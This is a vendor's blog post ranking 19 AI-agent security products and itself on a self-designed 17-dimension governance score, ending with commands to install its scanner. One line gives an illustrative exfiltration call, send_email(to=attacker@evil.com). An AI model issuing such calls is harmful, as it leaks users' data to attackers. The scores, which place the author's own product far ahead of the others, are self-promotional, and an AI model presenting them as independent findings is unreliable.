We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.
We published an open methodology to score AI agent governance across 17 dimensions. We scored ourselves and 19 competitors. Highest non-inline vendor: 55. Lowest: 11. Mean: 28. The results expose a 36-point architectural gap the market can't close with features.
We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.
There are over 20 vendors selling AI agent security in 2026. They all promise governance, visibility, and control. They use similar language in their pitch decks. They reference the same OWASP risks. They all claim to protect your AI agents.
We wanted to know which ones actually do.
So we built an open scoring methodology — 17 dimensions, published weights, reproducible evaluation — and scored every vendor we could find, including ourselves. The methodology is available for anyone to audit, challenge, or improve. The registry is version-controlled and refreshed when vendors ship meaningful new capabilities; the numbers in this post are from the 2026-04-10 refresh.
The results are uncomfortable.
The Scoring Framework
The Governance Score evaluates AI agent security across 17 dimensions grouped into three tiers.
Foundational controls cover the minimum viable governance: tool call interception, deny-by-default enforcement, agent identity management, data protection (PII tokenization, encryption), and audit trail integrity. Without these, there is no governance — there is monitoring.
Advanced capabilities include behavioral anomaly detection, post-execution output verification, environmental threat defense (trap detection), multi-agent governance (A2A delegation chains, taint propagation), and compliance framework mapping (EU AI Act, OWASP, MITRE ATLAS).
Operational maturity evaluates deployment flexibility (SaaS, VPC, air-gapped), onboarding friction (how long to full enforcement), adversarial testing tools (chaos engineering, penetration testing), and governance scoring transparency (do they score themselves?).
Each dimension is weighted by security impact. Tool call enforcement carries more weight than dashboard aesthetics. Cryptographic audit trails carry more weight than alerting integrations. The methodology is not designed to make any vendor look good — it is designed to identify where governance actually exists versus where marketing claims it does. We publish our own score under the same methodology and the same weights.
The Numbers (2026-04-10 registry)
| Vendor | Category | Score |
|---|---|---|
| SharkRouter | Tool-call gateway (inline) | 91 |
| Zenity | Out-of-band AI security posture | 55 |
| Wiz | Cloud security posture | 41 |
| Noma Security | Out-of-band AI security posture | 40 |
| Oasis Security | Non-human identity lifecycle | 38 |
| HiddenLayer | ML security | 34 |
| Portkey | LLM gateway | 32 |
| Protect AI (Palo Alto) | ML security | 32 |
| Lasso / Intent Security | AI security | 30 |
| Kong | API gateway | 27 |
| Robust Intelligence / Cisco | AI validation | 26 |
| Rubrik | Data recovery | 26 |
| Pangea / CrowdStrike | AI guard | 23 |
| NeuralTrust | AI security | 23 |
| Knostic | AI access control | 22 |
| Prompt Security | Prompt security | 21 |
| Cloudflare AI Gateway / Envoy | LLM gateway | 20 |
| mcp-scan / Snyk | MCP scanner | 18 |
| Lakera | Prompt security | 13 |
| aiFWall | AI firewall | 11 |
19 competitors. Mean 28. Median 26. Highest 55. Lowest 11. Full registry is in the Warden repo at warden/scanner/competitors.py — you can audit every weight yourself.
The Architectural Bands
The market splits into six architectural categories. Each category has a structural ceiling on what it can achieve.
Prompt-layer vendors — Lakera (13) and Prompt Security (21). They filter text entering and exiting the LLM. They catch jailbreaks, direct prompt injection, and toxic content. Their ceiling is set by position: they cannot see tool call arguments, tool results, or agent-to-agent delegation. Prompt injection defense is necessary. It is not governance.
Out-of-band AI security posture — Zenity (55) and Noma (40). They observe agent behavior from outside the execution path. They detect anomalies, generate alerts, and produce compliance reports. Zenity is the current ceiling of this category and — critically — the highest-scoring non-inline vendor on the board. Their structural ceiling: they can detect but cannot block. By the time an alert fires, the tool call has already executed. Detection without enforcement is monitoring, not governance.
Identity & NHI lifecycle — Oasis Security (38) and Knostic (22). They manage who agents are, what they can access, and who authorized them. They are strong on identity, discovery, and access management. Their ceiling: they know who the agent is and what it's allowed to access, but they don't know what the agent is actually doing with that access. An agent with valid identity and valid permissions can still be manipulated by environmental traps.
LLM gateways & API gateways — Portkey (32), Kong (27), Cloudflare AI Gateway / Envoy (20). They route traffic between agents and LLM providers. They handle cost tracking, caching, rate limiting, and provider failover. They see the traffic but don't understand it semantically. They route send_email(to=attacker@evil.com) the same way they route send_email(to=colleague@company.com) — it's all valid API traffic.
Cloud posture & AI validation — Wiz (41) and Robust Intelligence / Cisco (26). They evaluate infrastructure, scan configurations, and validate model deployments. They answer "is your AI infrastructure configured securely?" They do not answer "is your AI agent doing something it shouldn't be doing right now?"
ML security / model attack surface — HiddenLayer (34) and Protect AI / Palo Alto (32). They defend the model itself — adversarial inputs, model theft, training data poisoning. They're strong on the model attack surface, but they're not positioned to govern what the agent does with the model's output.
The Architectural Gap
The highest-scoring non-inline vendor scored 55. The market average is 28.
This is not because these vendors are poorly built. Many of them are excellent at what they do. The problem is architectural position. Each category occupies a specific position in the stack, and that position determines what they can see and what they can enforce.
No vendor that monitors from outside the execution path can block a tool call before it executes. No vendor that filters only prompts can scan tool results for hidden instructions. No vendor that manages only identity can verify that an agent's output matches its declared intent.
The gap between 55 (Zenity) and 91 (SharkRouter) is 36 points. It is not closable by adding features to existing architectures. It requires a fundamentally different position in the stack — inline, between the agent and everything it touches, with visibility into both requests and responses, tool calls and tool results, agent actions and agent context.
Where We Score Ourselves
We published our own score: 91 out of 100. We also published where we fall short.
Cloud and platform integration: 40%. We support Docker, Kubernetes, and Helm deployment, but we don't have native integrations with every cloud provider's security tooling.
Prompt-layer security: 67%. We have SemanticGuard and LLMGuard for intent analysis, but we are not a dedicated prompt injection vendor. Dedicated prompt-layer tools score higher on pure prompt filtering — although they score lower everywhere else, which is why their total lands at 13–21.
Data recovery: 50%. WORM audit provides immutable records and cryptographic shredding handles GDPR deletion, but we don't offer full disaster recovery orchestration.
Publishing where you score low is as important as publishing where you score high. A vendor that claims 100% coverage across all dimensions is either lying or hasn't been evaluated rigorously. We explicitly don't claim 100%.
How to Use the Score
The Governance Score is not a purchasing decision. It is a diagnostic tool.
Run Warden — our open-source governance scanner — against your own environment. It evaluates your codebase, MCP configurations, agent architecture, and infrastructure against the same 17 dimensions. The output tells you where your governance gaps are, not which vendor to buy.
If your score is below 30 (most organizations we scan), the first question is not "which vendor should we deploy?" The first question is "do we know how many AI agents are running in our environment right now?" Most enterprises cannot answer this question.
If your score is between 30 and 50, you likely have identity and access controls but lack enforcement. You know who your agents are. You don't know what they're doing in real time. You cannot block a tool call before it executes.
If your score is above 50, you have some inline enforcement capability. The question becomes: are you scanning tool results? Are you verifying output? Are you detecting environmental traps? Are you testing adversarially?
The Methodology Is Open
We publish the scoring methodology in full. Any vendor, researcher, or security team can evaluate themselves or evaluate us using the same framework. We welcome challenges to the weights, dimensions, or evaluation criteria — the registry is a source file in a public repository, and every score change is a commit with a rationale in the message.
The reason is simple: if the methodology is secret, it's marketing. If the methodology is open, it's a standard. The AI agent governance market needs standards, not more marketing.
Run Warden free against your own project — same 17 dimensions, same weights, same report format we use to score ourselves and every vendor in the registry:
pip install warden-ai
warden scan ./your-project --format html
Full registry, every vendor score, every weight, every rationale — all at github.com/SharkRouter/warden.
